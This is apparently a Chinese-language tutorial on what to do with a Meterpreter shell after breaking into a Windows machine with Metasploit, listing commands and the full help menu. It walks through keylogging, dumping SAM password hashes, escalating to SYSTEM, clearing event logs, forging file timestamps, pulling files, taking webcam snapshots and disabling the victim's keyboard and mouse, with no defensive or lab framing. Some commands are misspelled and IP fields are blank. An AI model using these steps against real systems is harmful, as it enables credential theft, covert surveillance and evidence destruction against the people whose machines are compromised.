当你用metasploit成功的入侵一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用
[*] Meterpreter session 1 opened ( ->
sessions -l 用于查看你控制的电脑
- Id Description Tunnel
- 4 meterpreter x86/win32 server-PC\Administrator @ SERVER-PC -> (
meterpreter >sessions -i 4
meterpreter >sysinfo
meterpreter > backround
meterpreter > ps
meterpreter > keyscan_start
keyscan_dump // 查看键盘记录
meterpreter > migrate
先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)
meterpreter > ipconfig
meterpreter > getuid
meterpreter > shell
meterpreter > Idletime
meterpreter > Hashdump
meterpreter > getsystem
meterpreter > clearev
meterpreter > execute (某Windows指令)
- meterpreter > execute
- Usage: execute -f file [options]
- Executes a command on the remote machine.
- -H Create the process hidden from view.
- -a <opt> The arguments to pass to the command.
- -c Channelized I/O (required for interaction).
- -d <opt> The 'dummy' executable to launch when using -m.
- -f <opt> The executable command to run.
- -h Help menu.
- -i Interact with the process after creating it.
- -k Execute process on the meterpreters current desktop
- -m Execute from memory.
- -s <opt> Execute process in a given session as the session user
- -t Execute process with currently impersonated thread token
meterpreter >timetomp
meterpreter >timestomp c:\\ -c "09/09/1980 12:12:34" 修改文件创建时间
meterpreter > timestomp c:\\ -m "01/01/1991 12:12:34" 修改文件修改时间
meterpreter > timestomp c:\\ -f c:\\ 讲文件属性复制到jzking121文件上面
meterpreter > download(文件路径)
meterpreter > download c:\\
[*] downloading: c:\ ->
[*] downloaded : c:\ ->
meterpreter > shutdown
meterpreter >screenshot
meterpreter > uictl enable keyboard 启用目标使用键盘
meterpreter > uictl disable mouse 禁止目标使用鼠标
enable 为启用
disable 禁用
meterpreter > webcam_list
meterpreter > webcam_snap
meterpreter > search -d c:\\ -f
- meterpreter > help
- Core Commands
- =============
- Command Description
- ------- -----------
- ? Help menu
- background Backgrounds the current session
- bgkill Kills a background meterpreter script
- bglist Lists running background scripts
- bgrun Executes a meterpreter script as a background thread
- channel Displays information about active channels
- close Closes a channel
- disable_unicode_encoding Disables encoding of unicode strings
- enable_unicode_encoding Enables encoding of unicode strings
- exit Terminate the meterpreter session
- help Help menu
- info Displays information about a Post module
- interact Interacts with a channel
- irb Drop into irb scripting mode
- load Load one or more meterpreter extensions
- migrate Migrate the server to another process
- quit Terminate the meterpreter session
- read Reads data from a channel
- resource Run the commands stored in a file
- run Executes a meterpreter script or Post module
- use Deprecated alias for 'load'
- write Writes data to a channel
- Stdapi: File system Commands
- ============================
- Command Description
- ------- -----------
- cat Read the contents of a file to the screen
- cd Change directory
- download Download a file or directory
- edit Edit a file
- getlwd Print local working directory
- getwd Print working directory
- lcd Change local working directory
- lpwd Print local working directory
- ls List files
- mkdir Make directory
- pwd Print working directory
- rm Delete the specified file
- rmdir Remove directory
- search Search for files
- upload Upload a file or directory
- Stdapi: Networking Commands
- ===========================
- Command Description
- ------- -----------
- ifconfig Display interfaces
- ipconfig Display interfaces
- portfwd Forward a local port to a remote service
- route View and modify the routing table
- Stdapi: System Commands
- =======================
- Command Description
- ------- -----------
- clearev Clear the event log
- drop_token Relinquishes any active impersonation token.
- execute Execute a command
- getpid Get the current process identifier
- getprivs Attempt to enable all privileges available to the current process
- getuid Get the user that the server is running as
- kill Terminate a process
- ps List running processes
- reboot Reboots the remote computer
- reg Modify and interact with the remote registry
- rev2self Calls RevertToSelf() on the remote machine
- shell Drop into a system command shell
- shutdown Shuts down the remote computer
- steal_token Attempts to steal an impersonation token from the target process
- sysinfo Gets information about the remote system, such as OS
- Stdapi: User interface Commands
- ===============================
- Command Description
- ------- -----------
- enumdesktops List all accessible desktops and window stations
- getdesktop Get the current meterpreter desktop
- idletime Returns the number of seconds the remote user has been idle
- keyscan_dump Dump the keystroke buffer
- keyscan_start Start capturing keystrokes
- keyscan_stop Stop capturing keystrokes
- screenshot Grab a screenshot of the interactive desktop
- setdesktop Change the meterpreters current desktop
- uictl Control some of the user interface components
- Stdapi: Webcam Commands
- =======================
- Command Description
- ------- -----------
- webcam_list List webcams
- webcam_snap Take a snapshot from the specified webcam
- Priv: Elevate Commands
- ======================
- Command Description
- ------- -----------
- getsystem Attempt to elevate your privilege to that of local system.
- Priv: Password database Commands
- ================================
- Command Description
- ------- -----------
- hashdump Dumps the contents of the SAM database
- Priv: Timestomp Commands
- ========================
- Command Description
- ------- -----------
- timestomp Manipulate file MACE attributes